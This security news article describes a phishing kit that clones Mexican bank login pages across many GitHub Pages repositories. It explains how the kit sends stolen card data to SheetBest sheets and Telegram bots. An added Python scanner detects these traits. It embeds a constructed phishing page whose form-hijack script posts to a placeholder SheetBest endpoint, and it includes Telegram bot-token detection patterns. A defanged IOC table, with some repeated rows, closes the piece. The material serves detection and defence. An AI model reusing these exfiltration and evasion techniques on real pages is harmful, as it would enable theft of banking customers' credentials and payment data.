A sophisticated, long-running phishing operation has evolved into a serverless, modular campaign that weaponizes GitHub Pages to harvest payment card data, credentials, and customer identifiers from banking customers in Mexico.
The campaign’s architecture centers on a phishing kit containing a selector panel that operators use to generate institution-specific landing pages.
Those landing pages impersonate at least a dozen financial institutions, supporting both desktop and mobile interfaces to maximize victim engagement.
Rather than relying on a single domain, operators deployed the kit across more than a hundred GitHub Pages repositories, each publishing cloned pages under varied directory paths (for example /cancelacion/, /soporte/, /mb1/) to increase redundancy, evade takedown, and enable rapid redeployment when individual repositories are removed.
Group-IB researchers have attributed the campaign's persistence, scale, and operational discipline to a reusable phishing kit that combines distributed GitHub Pages hosting, obfuscated client-side scripts, and third-party APIs, most notably SheetBest, to exfiltrate stolen data.
Modular Phishing Kit Uses GitHub Pages
Technically, the attack flow is multi-stage. Victims are lured to a trust-building impersonation page and then redirected to credential-harvesting forms that mimic legitimate banking login workflows.
The pages attach JavaScript submit listeners that call e.preventDefault(), serialize form field values into JSON, and POST them to SheetBest API endpoints.
Those requests populate attacker-controlled Google Sheets in real time, eliminating the need to maintain command-and-control servers.
Group-IB identified several SheetBest endpoints associated with the campaign, all resolving to the same backend IP, and observed identical submission logic reused across multiple templates, strong indicators of a centralized, serverless exfiltration backend supporting a many-to-one data collection model.
To complicate detection, phishing pages load obfuscated external JavaScript through randomized paths rather than embedding logic directly in HTML.
Payload rotation is possible without changing the visible page, undermining signature-based detection. Some instances also used hardcoded Telegram bot tokens and chat IDs to forward stolen credentials in real time, illustrating operational flexibility in exfiltration channels.
Repository metadata and commit histories reveal active maintenance by multiple operator accounts over more than a year, with continuous commits, template updates, and endpoint rotations.

Deployment leveraged Jekyll-based GitHub Pages builds and GitHub Actions for automation, and pages included Open Graph metadata to craft convincing link previews for messaging apps.
A robots noindex,nofollow meta directive confirmed these pages were not intended for organic discovery but for targeted distribution via SMS, WhatsApp, Telegram, or social media, where link previews can substantially increase click-through rates.
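The traits described in the two passages above (a submit listener that calls preventDefault(), SheetBest or Telegram bot references as the exfiltration channel, an external script under a randomized path, and Open Graph preview tags combined with a noindex,nofollow robots directive) can be turned into a static page scanner for triage. The following is an added example written for this article; it is not Group-IB's tooling or any code from the kit. The sample page, its hostname, sheet ID, script path and the entropy threshold are constructed assumptions, and the regex heuristics are deliberately simple.

```python
import math
import re
from collections import Counter
from urllib.parse import urlparse

# Constructed sample page carrying the traits the article describes.
# Hostname, sheet ID and script path are placeholders, not real indicators.
SAMPLE_HTML = """<html><head>
<meta name="robots" content="noindex,nofollow">
<meta property="og:title" content="Soporte - Banca en Linea">
<meta property="og:image" content="https://placeholder-kit.github.io/soporte/og.png">
<script src="/soporte/assets/q7x2m9/b7.js"></script>
</head><body>
<form id="f"><input name="card"><input name="nip"></form>
<script>
document.getElementById('f').addEventListener('submit', function (e) {
  e.preventDefault(); /* ... */
});
fetch('https://api.sheetbest.com/sheets/PLACEHOLDER-SHEET-ID', {method: 'POST'});
</script></body></html>"""

# Constructed benign page used as a control.
BENIGN_HTML = """<html><head><script src="/static/app.js"></script></head>
<body><form><button>Go</button></form></body></html>"""


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character; higher means more random-looking."""
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_random(segment: str) -> bool:
    """Heuristic for the randomized script paths the article describes
    (assumed threshold: mixed letters/digits, length >= 6, entropy >= 2.5)."""
    return (len(segment) >= 6
            and any(ch.isdigit() for ch in segment)
            and any(ch.isalpha() for ch in segment)
            and shannon_entropy(segment) >= 2.5)


def script_sources(html: str) -> list[str]:
    """Return src attributes of external <script> tags."""
    return re.findall(r'<script[^>]+src=["\']([^"\']+)["\']', html, re.I)


def scan_page(html: str) -> dict[str, bool]:
    """Map each kit trait to whether it is present in the page."""
    return {
        "robots_noindex_nofollow": bool(re.search(
            r'<meta[^>]+name=["\']robots["\'][^>]+content=["\'][^"\']*noindex[^"\']*nofollow',
            html, re.I)),
        "open_graph_preview": bool(re.search(r'property=["\']og:(title|image)["\']', html, re.I)),
        "random_path_script": any(
            looks_random(seg)
            for src in script_sources(html)
            for seg in urlparse(src).path.split("/") if seg),
        "submit_hijack": bool(re.search(r'addEventListener\(\s*["\']submit["\']', html)
                              and re.search(r'preventDefault\s*\(', html)),
        "sheetbest_endpoint": bool(re.search(r'api\.sheetbest\.com', html, re.I)),
        # Bot-token shaped reference to the Telegram Bot API.
        "telegram_bot_api": bool(re.search(r'api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+', html)),
    }


def score(signals: dict[str, bool]) -> int:
    """Number of traits present (booleans sum as 0/1)."""
    return sum(signals.values())


def verdict(html: str) -> str:
    """Triage label: a serverless exfil channel alone is 'high';
    otherwise three or more traits is 'medium', else 'low'."""
    s = scan_page(html)
    if s["sheetbest_endpoint"] or s["telegram_bot_api"]:
        return "high"
    return "medium" if score(s) >= 3 else "low"


if __name__ == "__main__":
    for name, page in (("sample", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        print(name, verdict(page), scan_page(page))
```

The scanner is meant to run over page bodies fetched by a brand-monitoring crawler or captured by a web proxy; the individual signals are weak on their own (many legitimate sites set Open Graph tags), so the verdict weights the exfiltration channel much more heavily than the presentation traits.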
This campaign underscores a maturing trend: threat actors are abusing reputable cloud platforms’ trust, HTTPS, and deployment ease to conduct resilient phishing at scale.
By exploiting services like GitHub Pages and SheetBest, attackers reduce their infrastructure footprint and complicate attribution and takedown efforts.
For defenders, the implications are clear: traditional blocklists and domain blacklisting are insufficient.
Financial institutions and security teams must prioritize behavioral detections, continuous monitoring for brand impersonation across developer and hosting platforms, rapid takedown coordination with service providers, and sector-wide intelligence sharing.
Indicators of Compromise (IOCs)
| # | Hostname | Count |
|---|---|---|
| 1 | soporte-index25.github[.]io | 2 |
| 2 | soporte-index09.github[.]io | 2 |
| 3 | sntdr-soporte25.github[.]io | 1 |
| 4 | sntdr-soporte25.github[.]io | 1 |
| 5 | 07-soporte.github[.]io | 2 |
| 6 | soporte2507.github[.]io | 2 |
| 7 | soporte160625.github[.]io | 3 |
| 8 | soporte250324.github[.]io | 2 |
| 9 | soporte74.github[.]io | 4 |
| 10 | soporte-bm1.github[.]io | 1 |
| 11 | soporte-r5.github[.]io | 3 |
| 12 | api.sheetbest.com | 2 |
| 13 | soporte0625.github[.]io | 2 |
| 14 | soporte200525.github[.]io | 2 |
| 15 | soporte2650.github[.]io | 1 |
| 16 | soporte-bn1.github[.]io | 1 |
| 17 | soporte-b2.github[.]io | 1 |
| 18 | soporte-index.github[.]io | 2 |
| 19 | soporte-c1.github[.]io | 1 |
| 20 | soporte-b4.github[.]io | 1 |
| 21 | sntndr25-soporte.github[.]io | 2 |
| 22 | sntndr-soporte0825.github[.]io | 2 |
| 23 | 0825-soporte.github[.]io | 2 |
| 24 | soporte-07-25.github[.]io | 2 |
| 25 | soporte-0725.github[.]io | 2 |
| 26 | 0725soporte.github[.]io | 2 |
| 27 | soporte0725-3.github[.]io | 2 |
| 28 | soporte0725.github[.]io | 2 |
| 29 | soporteyatencionf.github[.]io | 2 |
| 30 | 0725-soporte.github[.]io | 2 |
| 31 | soporte-y-atencion.github[.]io | 1 |
| 32 | soporter03.github[.]io | 1 |
| 33 | respaldo94.github[.]io | 2 |
| 34 | soporte-index05.github[.]io | 1 |
| 35 | soporte-b1.github[.]io | 1 |
| 36 | soporte0625.github[.]io | 2 |
| 37 | soporte250324.github[.]io | 2 |
| 38 | fldsmdfr-94.github[.]io | 2 |
| 39 | support-vh.github[.]io | 1 |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.